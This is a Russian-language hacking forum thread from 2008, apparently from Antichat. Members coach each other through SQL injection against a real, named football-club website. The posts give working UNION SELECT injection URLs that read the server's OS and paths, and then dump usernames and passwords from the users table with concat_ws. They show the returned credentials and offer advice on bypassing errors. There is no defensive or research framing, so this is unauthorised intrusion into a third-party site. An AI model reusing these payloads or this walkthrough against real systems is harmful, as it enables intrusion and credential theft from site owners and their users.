HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1631  
Старый 10.04.2008, 10:28
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
С нами: 9567101

Репутация: 17
По умолчанию

Знающие люди,кому не сложно помочь,стукните в 380-225-866

P.S. Статью [ cash ] 'a уже до дыр зачитал.Не могу выполнить ни одно из действий,описанных там,т.к.постоянно выдаётся ошибка "Incorrect syntax near <оператор>"

Последний раз редактировалось SQL~In[J]ecTi0n; 10.04.2008 в 11:18..
 
Ответить с цитированием

  #1632  
Старый 10.04.2008, 13:42
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Цитата:
Сообщение от +toxa+  
Ухты! Как много ты умных слов ты знаешь. Не можешь отличить активку от пассивки, а уже xss через HTTP заголовок замутил. TRACE бесполезный? А если на сайте куки с атрибутом httpOnly? Эту пассивку можно нормально использовать (с токи зрения жертвы) только через swf или через отправку пакета через XMLHttpRequest


Необязательно.
Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
 
Ответить с цитированием

  #1633  
Старый 10.04.2008, 15:08
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

А что если при запросе из таблицы users по клонкам login,pass вернулось 'voidass'
База пустая чтоли? :Р Версия бд 4.1.18

Warning: getimagesize(6): failed to open stream: No such file or directory in /www/anthost/www/htdocs/fc-anji/news.php on line 141

Query failed: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

использовал знаменитый алгоритм шифрования AES:РРР

http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@versi on_compile_os,0x71),0x71),3,4,5,6/*

portbld-freebsd5.4


http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@based ir,0x71),0x71),3,4,5,6/*

Тут неполучилось:Р,с одним @ тоже))

Последний раз редактировалось Велемир; 10.04.2008 в 15:13..
 
Ответить с цитированием

  #1634  
Старый 10.04.2008, 15:17
gibson
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами: 10636106

Репутация: 705
По умолчанию

Цитата:
Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
иди доки лучше по читай, здесь никто никому ничего не должен объснять или показывать.
Цитата:
А что если при запросе из таблицы users по клонкам login,pass вернулось voidass
База пустая чтоли? :Р Версия бд 4.1.18
Если что-то вернулось значит не пусто, используй объединение concat или concat_ws с разделителем можно просто :, а можно в хексе.
concat(user,':',pass)
concat_ws(0x3a,user,pass)
 
Ответить с цитированием

  #1635  
Старый 10.04.2008, 15:30
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login, pass),3,4,5,6+from+users/*

Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:

void: pass ))))))

Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (

Последний раз редактировалось Велемир; 10.04.2008 в 15:38..
 
Ответить с цитированием

  #1636  
Старый 10.04.2008, 16:12
gibson
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами: 10636106

Репутация: 705
По умолчанию

Цитата:
Сообщение от Велемир  
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login, pass),3,4,5,6+from+users/*

Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:
void: pass ))))))
Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (
все правильно при таком запросе у тя будет
Цитата:
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3b,login, pass),3,4,5,6+from+users+limit+0,1/*
void;pass -> login: void pass: pass
0x3b -> разделитель ;
больше записей в users нету поэтому пустой рез.
Цитата:
доступа к mysql.user и information?schema.tables нету
Версия бд 4.1.18
Ну нет доступа это обычное дело, правильно права выставлены.
 
Ответить с цитированием

  #1637  
Старый 10.04.2008, 16:19
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Кто-то постарался знач : ) Пасип что разъяснил:Р

Последний раз редактировалось Велемир; 10.04.2008 в 16:23..
 
Ответить с цитированием

  #1638  
Старый 10.04.2008, 16:21
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами: 10263386

Репутация: 849
По умолчанию

information_schema присутствует с версии 5 и далее
 
Ответить с цитированием

  #1639  
Старый 10.04.2008, 16:24
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Цитата:
Сообщение от Велемир  
Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
В интернете мало доков по http? Скачай себе http intruder, там есть конструктор пакетов =\
__________________
 
Ответить с цитированием

  #1640  
Старый 10.04.2008, 16:24
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Цитата:
Сообщение от Basurman  
information_schema присутствует с версии 5 и далее
Хыхы,а я и забыл ))))
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.